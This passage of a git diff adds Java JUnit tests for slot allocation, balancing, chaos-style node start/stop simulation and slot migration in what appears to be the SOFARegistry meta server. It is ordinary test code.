checker] leaderCount: " + leaderCount); + String msg = + StringFormatter.format( + "datas={},counts={}", + new TreeSet(dataNodes), + new TreeSet(leaderCount.keySet())); + Assert.assertEquals(msg, dataNodes.size(), leaderCount.size()); + Assert.assertTrue(leaderCount.keySet().containsAll(dataNodes)); + Tuple max = max(leaderCount); + Tuple min = min(leaderCount); + int average = MathUtils.divideCeil(sum(leaderCount), leaderCount.size()); + logger.info( + "[slot leader checker] max-ip: {}, max-count:{}, min-ip: {}, min-count:{}, average: {}", + max.getFirst(), + max.getSecond(), + min.getFirst(), + min.getSecond(), + (int) average); + TestUtils.assertBalance(slotTable, dataNodes, slotNum, replicas, false, ""); + return max.getSecond() < min.getSecond() * 2; + } +} + +class SlotChecker implements CheckerAction { + + private final Logger logger = LoggerFactory.getLogger(getClass()); + + @Override + public boolean doCheck(SlotTable slotTable, List dataNodes, int slotNum, int replicas) { + Map slotCount = SlotTableUtils.getSlotTableSlotCount(slotTable); + logger.info("[slot checker] slotCount: " + slotCount); + Assert.assertEquals(dataNodes.size(), slotCount.size()); + Assert.assertTrue(slotCount.keySet().containsAll(dataNodes)); + Tuple max = max(slotCount); + Tuple min = min(slotCount); + double average = average(slotCount); + logger.info( + "[slot checker] max-ip: {}, max-count:{}, min-ip: {}, min-count:{}, average: {}", + max.getFirst(), + max.getSecond(), + min.getFirst(), + min.getSecond(), + (int) average); + TestUtils.assertBalance(slotTable, dataNodes, slotNum, replicas, false, ""); + return max.getSecond() < min.getSecond() * 2; + } +} + +enum CheckEnum { + SLOT_LEADER_CHECKER(new SlotLeaderChecker()), + + SLOT_CHECKER(new SlotChecker()), + ; + + private CheckerAction checkerAction; + + CheckEnum(CheckerAction checkerAction) { + this.checkerAction = checkerAction; + } + + /** + * Getter method for property checkerAction. + * + * @return property value of checkerAction + */ + public CheckerAction getCheckerAction() { + return checkerAction; + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/chaos/InjectionAction.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/chaos/InjectionAction.java new file mode 100644 index 000000000..236ea6e47 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/chaos/InjectionAction.java @@ -0,0 +1,107 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.chaos; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.server.meta.slot.util.ListUtil; +import java.util.List; +import java.util.Random; +import org.springframework.util.CollectionUtils; + +public interface InjectionAction { + + Random random = new Random(); + + void doInject(List total, List running); +} + +enum InjectionEnum { + FIRST(0, new FirstInjectionAction()), + START(70, new StartInjectionAction()), + STOP(30, new StopInjectionAction()), + FINAL(0, new FinalInjectionAction()), + ; + + private int percent; + + private InjectionAction injectionAction; + + public static final Random random = new Random(); + + InjectionEnum(int percent, InjectionAction injectionAction) { + this.percent = percent; + this.injectionAction = injectionAction; + } + + public static InjectionEnum pickInject() { + int percent = random.nextInt(100); + if (percent < STOP.percent) { + return STOP; + } else { + return START; + } + } + + /** + * Getter method for property injectionAction. + * + * @return property value of injectionAction + */ + public InjectionAction getInjectionAction() { + return injectionAction; + } +} + +class FirstInjectionAction implements InjectionAction { + + @Override + public void doInject(List total, List running) { + running.addAll(ListUtil.randomPick(total, 1)); + } +} + +class StartInjectionAction implements InjectionAction { + + @Override + public void doInject(List total, List running) { + List reduce = ListUtil.reduce(total, running); + + if (CollectionUtils.isEmpty(reduce)) { + return; + } + + int count = Math.min(total.size() / 3, random.nextInt(reduce.size()) + 1); + running.addAll(ListUtil.randomPick(reduce, count)); + } +} + +class StopInjectionAction implements InjectionAction { + + @Override + public void doInject(List total, List running) { + running.removeAll(ListUtil.randomPick(running, random.nextInt(running.size()) / 3 + 1)); + } +} + +class FinalInjectionAction implements InjectionAction { + + @Override + public void doInject(List total, List running) { + List reduce = ListUtil.reduce(total, running); + running.addAll(reduce); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/chaos/SlotChaosTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/chaos/SlotChaosTest.java new file mode 100644 index 000000000..5941e6dbf --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/chaos/SlotChaosTest.java @@ -0,0 +1,168 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.chaos; + +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.lease.data.DefaultDataServerManager; +import com.alipay.sofa.registry.server.meta.monitor.SlotTableMonitor; +import com.alipay.sofa.registry.server.meta.slot.arrange.ScheduledSlotArranger; +import com.alipay.sofa.registry.server.meta.slot.manager.SimpleSlotManager; +import com.alipay.sofa.registry.server.shared.util.NodeUtils; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import java.util.ArrayList; +import java.util.List; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +/** + * @author xiaojian.xj + * @version $Id: SlotChaosTest.java, v 0.1 2021年02月02日 11:47 xiaojian.xj Exp $ + */ +public class SlotChaosTest extends AbstractMetaServerTestBase { + + private DataServerInjection dataServerInjection; + + private SimpleSlotManager slotManager; + + @Mock private DefaultDataServerManager dataServerManager; + + private ScheduledSlotArranger scheduledSlotArranger; + + @Mock private SlotTableMonitor slotTableMonitor; + + private int dataNodeNum = 20; + + private int chaosRandom; + + @Before + public void beforeSlotMigrateChaosTest() throws Exception { + MockitoAnnotations.initMocks(this); + makeMetaLeader(); + + logger.info("[slot-chaos data-node] size: " + dataNodeNum); + dataServerInjection = new DataServerInjection(dataNodeNum); + + NodeConfig nodeConfig = mock(NodeConfig.class); + when(nodeConfig.getLocalDataCenter()).thenReturn(getDc()); + slotManager = new SimpleSlotManager(); + slotManager.setSlotNums(256); + slotManager.setSlotReplicas(2); + scheduledSlotArranger = + new ScheduledSlotArranger( + dataServerManager, slotManager, slotTableMonitor, metaLeaderService); + + when(slotTableMonitor.isStableTableStable()).thenReturn(true); + when(dataServerManager.getDataServerMetaInfo()).thenReturn(VersionedList.EMPTY); + } + + @Test + public void testChaosLoop() throws Exception { + for (int i = 0; i < 100; i++) { + testChaos(); + } + } + + @Test + public void testChaos() throws Exception { + logger.info("[slot-chaos slot] size: " + slotManager.getSlotNums()); + + do { + chaosRandom = random.nextInt(100); + } while (chaosRandom < 30); + + makeMetaLeader(); + logger.info("[slot-chaos slot] chaosRandom: " + chaosRandom); + + List running = null; + + for (int i = 1; i <= chaosRandom; i++) { + // random up and down + running = dataServerInjection.inject(i); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), running)); + scheduledSlotArranger.arrangeSync(); + } + logger.info("[slot-chaos slot] begin balance"); + int count = 0; + for (; count < slotManager.getSlotNums() * 4; count++) { + if (!scheduledSlotArranger.arrangeSync()) { + break; + } + } + Assert.assertFalse("unbalance after:" + count, scheduledSlotArranger.arrangeSync()); + SlotTable finalSlotTable = slotManager.getSlotTable(); + List datas = NodeUtils.transferNodeToIpList(running); + for (CheckEnum checker : CheckEnum.values()) { + checker + .getCheckerAction() + .doCheck( + finalSlotTable, datas, slotManager.getSlotNums(), slotManager.getSlotReplicaNums()); + } + } + + public class DataServerInjection { + private int dataNodeNum; + + private List dataNodes; + + private List runningDataNodes = new ArrayList<>(); + + public DataServerInjection(int dataNodeNum) { + this.dataNodeNum = dataNodeNum; + this.dataNodes = randomDataNodes(dataNodeNum); + logger.info("[slot-chaos data-node] dataNodes: " + dataNodes); + } + + public List inject(int chaos) { + InjectionEnum injectType; + if (chaos == 1 || runningDataNodes.size() == 0) { + injectType = InjectionEnum.FIRST; + } else if (chaos == chaosRandom) { + injectType = InjectionEnum.FINAL; + } else if (runningDataNodes.size() == dataNodeNum) { + injectType = InjectionEnum.STOP; + } else { + injectType = InjectionEnum.pickInject(); + } + + logger.info( + "[slot-chaos inject before] chaos: {}, type: {}, size: {}, nodes: {}", + chaos, + injectType, + runningDataNodes.size(), + runningDataNodes); + injectType.getInjectionAction().doInject(dataNodes, runningDataNodes); + logger.info( + "[slot-chaos inject after] chaos: {}, type: {}, size: {}, nodes: {}", + chaos, + injectType, + runningDataNodes.size(), + runningDataNodes); + return runningDataNodes; + } + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/manager/DefaultSlotManagerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/manager/DefaultSlotManagerTest.java new file mode 100644 index 000000000..1c9cf28d6 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/manager/DefaultSlotManagerTest.java @@ -0,0 +1,67 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.manager; + +import static org.mockito.Matchers.any; +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.exception.SofaRegistryRuntimeException; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.remoting.notifier.Notifier; +import org.assertj.core.util.Lists; +import org.junit.Before; +import org.junit.Test; +import org.mockito.MockitoAnnotations; + +public class DefaultSlotManagerTest extends AbstractMetaServerTestBase { + + private DefaultSlotManager slotManager; + + @Before + public void beforeDefaultSlotManagerTest() throws Exception { + MockitoAnnotations.initMocks(this); + when(metaLeaderService.amIStableAsLeader()).thenReturn(true); + when(metaLeaderService.amILeader()).thenReturn(true); + slotManager = new DefaultSlotManager(metaLeaderService); + slotManager.postConstruct(); + } + + @Test + public void testSlotChangeNotification() throws InterruptedException { + Notifier notifier = mock(Notifier.class); + slotManager.setNotifiers(Lists.newArrayList(notifier)); + slotManager.refresh(randomSlotTable()); + Thread.sleep(100); + verify(notifier, atLeast(1)).notifySlotTableChange(any()); + } + + @Test + public void testSlotChangeNotifyOneFailWontAffectOthers() throws InterruptedException { + Notifier notifier1 = mock(Notifier.class); + Notifier notifier2 = mock(Notifier.class); + Notifier notifier3 = mock(Notifier.class); + doThrow(new SofaRegistryRuntimeException("expected")) + .when(notifier2) + .notifySlotTableChange(any()); + slotManager.setNotifiers(Lists.newArrayList(notifier1, notifier2, notifier3)); + + slotManager.refresh(randomSlotTable()); + Thread.sleep(100); + verify(notifier1, atLeast(1)).notifySlotTableChange(any()); + verify(notifier3, atLeast(1)).notifySlotTableChange(any()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/manager/SimpleSlotManagerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/manager/SimpleSlotManagerTest.java new file mode 100644 index 000000000..1996070e4 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/manager/SimpleSlotManagerTest.java @@ -0,0 +1,178 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.manager; + +import static org.junit.Assert.assertEquals; +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.DataNodeSlot; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import java.util.List; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.CyclicBarrier; +import java.util.concurrent.atomic.AtomicReference; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class SimpleSlotManagerTest extends AbstractMetaServerTestBase { + + private SimpleSlotManager slotManager; + + @Mock private NodeConfig nodeConfig; + + @Before + public void beforeLocalSlotManagerTest() throws Exception { + MockitoAnnotations.initMocks(this); + when(nodeConfig.getLocalDataCenter()).thenReturn(getDc()); + slotManager = new SimpleSlotManager(); + } + + @Test + public void testRefresh() { + slotManager = spy(slotManager); + List dataNodes = + Lists.newArrayList( + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc())); + slotManager.refresh(new SlotTableGenerator(dataNodes).createSlotTable()); + verify(slotManager, times(1)).refresh(any()); + Assert.assertFalse( + slotManager.getDataNodeManagedSlot(dataNodes.get(0).getIp(), false).getLeaders().isEmpty()); + Assert.assertTrue( + slotManager + .getDataNodeManagedSlot(dataNodes.get(0).getIp(), true) + .getFollowers() + .isEmpty()); + } + + @Test + public void testRefreshWithLowerEpoch() { + List dataNodes = + Lists.newArrayList( + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc())); + SlotTable slotTable = new SlotTableGenerator(dataNodes).createSlotTable(); + slotManager = spy(slotManager); + slotManager.refresh(slotTable); + SlotTable lowerEpochTable = new SlotTable(10, slotTable.getSlotMap().values()); + slotManager.refresh(lowerEpochTable); + // verify(slotManager, times(1)).setSlotTableCacheWrapper(any()); + } + + @Test + public void testConcurrentModification() throws InterruptedException { + CyclicBarrier barrier = new CyclicBarrier(2); + CountDownLatch latch = new CountDownLatch(2); + List dataNodes = + Lists.newArrayList( + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc())); + + executors.execute( + () -> { + try { + barrier.await(); + slotManager.refresh(new SlotTableGenerator(dataNodes).createSlotTable()); + } catch (Exception e) { + } + latch.countDown(); + }); + AtomicReference ref = new AtomicReference<>(); + executors.execute( + () -> { + try { + barrier.await(); + } catch (Exception e) { + + } + ref.set(slotManager.getSlotTable()); + latch.countDown(); + }); + latch.await(); + Assert.assertNotNull(ref.get()); + } + + @Test + public void testGetDataNodeManagedSlot() { + List dataNodes = + Lists.newArrayList( + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc())); + slotManager.refresh(new SlotTableGenerator(dataNodes).createSlotTable()); + DataNodeSlot dataNodeSlot = slotManager.getDataNodeManagedSlot(dataNodes.get(0).getIp(), false); + assertEquals(dataNodes.get(0).getIp(), dataNodeSlot.getDataNode()); + dataNodeSlot + .getLeaders() + .forEach( + slotId -> + Assert.assertEquals( + slotManager.getSlotTable().getSlot(slotId).getLeader(), + dataNodeSlot.getDataNode())); + dataNodeSlot + .getFollowers() + .forEach( + slotId -> + Assert.assertTrue( + slotManager + .getSlotTable() + .getSlot(slotId) + .getFollowers() + .contains(dataNodeSlot.getDataNode()))); + logger.info("[leaders] {}", dataNodeSlot.getLeaders()); + logger.info("[followers] {}", dataNodeSlot.getFollowers()); + slotManager + .getSlotTable() + .getSlotMap() + .forEach( + (slotId, slot) -> { + if (slot.getLeader().equalsIgnoreCase(dataNodeSlot.getDataNode())) { + logger.info("[slot] {}", slotId); + Assert.assertTrue(dataNodeSlot.getLeaders().contains(slotId)); + } + }); + } + + @Test + public void testGetSlotNums() { + Assert.assertEquals(SlotConfig.SLOT_NUM, slotManager.getSlotNums()); + } + + @Test + public void testGetSlotReplicaNums() { + Assert.assertEquals(SlotConfig.SLOT_REPLICAS, slotManager.getSlotReplicaNums()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/tasks/BalanceTaskTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/tasks/BalanceTaskTest.java new file mode 100644 index 000000000..531c29935 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/tasks/BalanceTaskTest.java @@ -0,0 +1,125 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.tasks; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.lease.data.DataServerManager; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.alipay.sofa.registry.server.meta.slot.manager.SimpleSlotManager; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import java.util.List; +import java.util.concurrent.TimeoutException; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class BalanceTaskTest extends AbstractMetaServerTestBase { + + private BalanceTask task; + + private SlotManager slotManager; + + @Mock private DataServerManager dataServerManager; + + @Before + public void beforeInitReshardingTaskTest() throws Exception { + MockitoAnnotations.initMocks(this); + List dataNodes = + Lists.newArrayList( + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + NodeConfig nodeConfig = mock(NodeConfig.class); + when(nodeConfig.getLocalDataCenter()).thenReturn(getDc()); + slotManager = new SimpleSlotManager(); + } + + @Test + public void testRun() throws TimeoutException, InterruptedException { + Assert.assertEquals(SlotTable.INIT, slotManager.getSlotTable()); + task = + new BalanceTask(slotManager, dataServerManager.getDataServerMetaInfo().getClusterMembers()); + task.run(); + Assert.assertNotEquals(SlotTable.INIT, slotManager.getSlotTable()); + printSlotTable(slotManager.getSlotTable()); + } + + @Test + public void testNoDupLeaderAndFollower() throws Exception { + List dataNodes = + Lists.newArrayList( + new DataNode(new URL("100.88.142.32"), getDc()), + new DataNode(new URL("100.88.142.36"), getDc()), + new DataNode(new URL("100.88.142.19"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + task = + new BalanceTask(slotManager, dataServerManager.getDataServerMetaInfo().getClusterMembers()); + task.run(); + SlotTable slotTable = slotManager.getSlotTable(); + slotTable + .getSlotMap() + .forEach( + (slotId, slot) -> { + Assert.assertFalse(slot.getFollowers().contains(slot.getLeader())); + }); + } + + @Test + public void nonExecutionDueToEmptyDataSet() { + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), Lists.newArrayList())); + slotManager = spy(slotManager); + task = + new BalanceTask(slotManager, dataServerManager.getDataServerMetaInfo().getClusterMembers()); + task.run(); + verify(slotManager, never()).refresh(any(SlotTable.class)); + } + + @Test + public void testSlotEpochCorrect() { + List dataNodes = randomDataNodes(3); + SlotTable prev = randomSlotTable(dataNodes); + slotManager.refresh(prev); + + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + task = + new BalanceTask(slotManager, dataServerManager.getDataServerMetaInfo().getClusterMembers()); + task.run(); + + SlotTable current = slotManager.getSlotTable(); + for (int slotId = 0; slotId < SlotConfig.SLOT_NUM; slotId++) { + Assert.assertTrue( + prev.getSlot(slotId).getLeaderEpoch() < current.getSlot(slotId).getLeaderEpoch()); + } + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/tasks/SlotMigrationIntegrationTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/tasks/SlotMigrationIntegrationTest.java new file mode 100644 index 000000000..0f80b3745 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/tasks/SlotMigrationIntegrationTest.java @@ -0,0 +1,465 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.tasks; + +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.lifecycle.LifecycleState; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.lease.data.DefaultDataServerManager; +import com.alipay.sofa.registry.server.meta.monitor.SlotTableMonitor; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.alipay.sofa.registry.server.meta.slot.arrange.ScheduledSlotArranger; +import com.alipay.sofa.registry.server.meta.slot.balance.NaiveBalancePolicy; +import com.alipay.sofa.registry.server.meta.slot.manager.DefaultSlotManager; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotTableBuilder; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.alipay.sofa.registry.util.FileUtils; +import com.alipay.sofa.registry.util.JsonUtils; +import com.fasterxml.jackson.annotation.JsonCreator; +import com.fasterxml.jackson.annotation.JsonProperty; +import com.google.common.collect.Maps; +import java.io.File; +import java.util.List; +import java.util.Map; +import org.assertj.core.util.Lists; +import org.junit.*; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +/** + * @author chen.zhu + *

Jan 14, 2021 + */ +public class SlotMigrationIntegrationTest extends AbstractMetaServerTestBase { + + private SlotManager slotManager; + + @Mock private DefaultDataServerManager dataServerManager; + + @Mock private SlotTableMonitor slotTableMonitor; + + @Mock private MetaLeaderService leaderElector; + + @Before + public void beforeSlotMigrationIntegrationTest() throws Exception { + MockitoAnnotations.initMocks(this); + List dataNodes = + Lists.newArrayList( + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + NodeConfig nodeConfig = mock(NodeConfig.class); + when(nodeConfig.getLocalDataCenter()).thenReturn(getDc()); + when(leaderElector.amIStableAsLeader()).thenReturn(true); + when(leaderElector.amILeader()).thenReturn(true); + slotManager = new DefaultSlotManager(leaderElector); + when(slotTableMonitor.isStableTableStable()).thenReturn(true); + } + + @After + public void afterSlotMigrationIntegrationTest() throws Exception { + System.setProperty( + NaiveBalancePolicy.PROP_LEADER_MAX_MOVE, + String.valueOf(NaiveBalancePolicy.DEF_LEADER_MAX_MOVE)); + } + + @Test + public void testDataServerAddedOneByOne() throws Exception { + System.setProperty(NaiveBalancePolicy.PROP_LEADER_MAX_MOVE, SlotConfig.SLOT_NUM + ""); + ScheduledSlotArranger arranger = + new ScheduledSlotArranger(dataServerManager, slotManager, slotTableMonitor, leaderElector); + arranger.getLifecycleState().setPhase(LifecycleState.LifecyclePhase.STARTED); + List dataNodes = Lists.newArrayList(new DataNode(new URL("100.88.142.32"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + makeMetaLeader(); + arranger.arrangeSync(); + + dataNodes = + Lists.newArrayList( + new DataNode(new URL("100.88.142.32"), getDc()), + new DataNode(new URL("100.88.142.36"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + loopArrange(arranger); + Assert.assertTrue( + isSlotTableBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + + Thread.sleep(2); + loopArrange(arranger); + Assert.assertTrue( + isSlotTableBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + Assert.assertTrue( + isSlotTableLeaderBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + + Thread.sleep(2); + dataNodes = + Lists.newArrayList( + new DataNode(new URL("100.88.142.32"), getDc()), + new DataNode(new URL("100.88.142.36"), getDc()), + new DataNode(new URL("100.88.142.19"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + loopArrange(arranger); + logger.info( + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(slotManager.getSlotTable())); + Assert.assertTrue( + isSlotTableBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + + Thread.sleep(2); + dataNodes = + Lists.newArrayList( + new DataNode(new URL("100.88.142.32"), getDc()), + new DataNode(new URL("100.88.142.36"), getDc()), + new DataNode(new URL("100.88.142.19"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + loopArrange(arranger); + logger.info( + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(slotManager.getSlotTable())); + Assert.assertTrue( + isSlotTableBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + Assert.assertTrue( + isSlotTableLeaderBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + } + + @Test + public void testDataServerAddedAndDeleted() throws Exception { 